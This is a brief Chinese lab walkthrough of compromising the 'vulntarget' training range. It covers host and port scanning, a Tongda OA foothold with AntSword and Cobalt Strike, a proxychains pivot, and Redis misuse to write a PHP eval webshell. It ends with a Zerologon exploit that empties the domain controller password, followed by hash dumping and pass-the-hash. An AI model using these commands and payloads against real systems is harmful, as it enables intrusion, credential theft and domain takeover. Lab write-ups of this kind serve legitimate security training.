1、主机发现
arp-scan -l
2、端口发现
nmap -sS -sV -O -Pn -A 192.168.0.23
3、可以考虑用永恒之蓝直接打,但发现是80端口是通达OA,直接用工具上
4、蚁剑连接,配合cs上线
5、信息收集(systeminfo、主机发现、端口、域、密码)
发现并不在域中,但有一个同网段的内网主机
6、发现redis6379端口
尝试redis
由于无法直接访问10.0.20.99,需设置代理
7、kali中设置代理
/etc/proxychains4.conf
8、代理火狐打开10.0.20.99
9、扫网站目录,发现phpinfo.php(网站绝对路径)
proxychains dirb http://10.0.20.99
访问http://10.0.20.99/phpinfo.php
10、kali中redis连接
proxychains redis-cli -h 10.0.20.99 //kali未授权登录 config set dir "C:/phpStudy/PHPTutorial/WWW/" //redis写shell config set dbfilename tx.php set 1 "<?php @eval($_POST['tx']);?>" save
11、蚁剑挂代理连接
12、win2016上线cs
由于kali与win2016不在一个网段,无法直接上线,需要在cs中已上线的win7中设置监听(因为win7和win2016有一个网段一样)
必须选择x64,否则执行不了(如果还不行,把win7防火墙关掉)
cs上线
13、信息收集(systeminfo、主机发现、端口、域、密码)
在vulntarget.com域中
域管理员:Administrator
域控主机:win2019
域成员:win2016
14、使用CVE-2020-1472(域内提权)拿域控
可以尝试使用永恒之蓝试试(大概率不行)
此处是直接使用CVE-2020-1472(域内提权)
首先cs设置个代理
这里的代理写错了,是39999(cs中设置的代理要和小帽子中要一致)
小帽子测试连接(虽然是接收数据错误,但不影响)
小帽子中打开命令提示符
(1) 检测域控是否存在漏洞
python3 zerologon_check_vulnerable.py win2019 10.0.10.110
存在漏洞
(2)使用exp将域控密码重置为空 , 这一步会把域控的密码置为空
python3 zero-logon-exploit.py win2019 10.0.10.110
(3) 然后使用空密码获取hash
python3 secretsdump.py -no-pass "vulntarget/win2019$@10.0.10.110"
(4)cs上线
或用wmiexec.exe
wmiexec.exe -hashes 00000000000000000000000000000000:c7c654da31ce51cbeecfef99e637be15 administrator@10.0.10.110
成功!